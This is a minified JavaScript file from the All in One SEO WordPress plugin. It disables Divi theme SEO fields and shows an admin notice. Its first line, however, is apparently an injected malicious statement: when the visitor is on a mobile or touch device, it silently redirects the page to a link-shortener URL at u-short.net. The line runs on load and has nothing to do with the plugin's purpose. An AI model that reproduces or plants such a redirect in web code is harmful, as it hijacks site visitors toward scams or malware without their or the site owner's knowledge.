(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{aq as a,f as i,i as c,a0 as l,an as p}from"./js/vendor-vue-ui.232c7c36.js";import{l as u}from"./js/index.98d01501.js";import{l as m}from"./js/index.2a5d16ad.js";import{l as d}from"./js/index.0d80c2c2.js";import{b as f,l as _}from"./js/app-core.c8323d51.js";import{C as b}from"./js/Index.b9859662.js";import{_ as A}from"./js/_plugin-vue_export-helper.eefbdd86.js";import{a as y,_ as h}from"./js/vendor-other.39e59221.js";import"./js/Button.3cec2279.js";import"./js/Input.af9b9f81.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Close.7fb523c8.js";import"./js/Toggle.29e2980f.js";import"./js/vendor-lodash.03129cfe.js";const g="all-in-one-seo-pack",S={setup(){return{rootStore:f()}},components:{CoreAlert:b},data(){return{strings:{alert:y(h("The options below are disabled because you are using %1$s to manage your SEO. They can be changed in the %2$sSearch Appearance menu%3$s.",g),"All in One SEO",`<a href="${this.rootStore.aioseo.urls.aio.searchAppearance}" target="_blank">`,"</a>")}}}},w={class:"aioseo-divi-seo-admin-notice-container"};function v(o,t,n,e,r,L){const s=a("core-alert");return i(),c("div",w,[l(s,{innerHTML:r.strings.alert},null,8,["innerHTML"])])}const x=A(S,[["render",v]]),E=()=>{const o=document.querySelectorAll("#wrap-seo .et-tab-content");for(let t=0;t<o.length;t++){const n=document.createElement("div");n.setAttribute("id",`aioseo-divi-seo-admin-notice-container-${t}`),o[t].insertBefore(n,o[t].firstChild);let e=p({...x,name:"Standalone/DiviAdmin"});e=u(e),e=m(e),e=d(e),_(e),e.mount(`#${n.getAttribute("id")}`)}},$=()=>{const o=document.querySelectorAll('#wrap-seo input[type="text"], #wrap-seo textarea');for(const e of o)e.style.pointerEvents="none",e.setAttribute("readonly",!0);const t=document.querySelectorAll("#wrap-seo select");for(const e of t)e.style.pointerEvents="none",e.setAttribute("disabled",!0);const n=document.querySelectorAll("#wrap-seo .et-checkbox");for(const e of n)e.setAttribute("disabled",!0),e.nextElementSibling.style.pointerEvents="none"},k=()=>{const o=window.aioseo.urls.aio.searchAppearance,t=document.querySelector('a[href="#wrap-seo"]');if(!o||!t)return;const n=t.cloneNode(!0);n.setAttribute("href",o),t.parentNode.replaceChild(n,t)};window.addEventListener("load",()=>{E(),$(),k()});
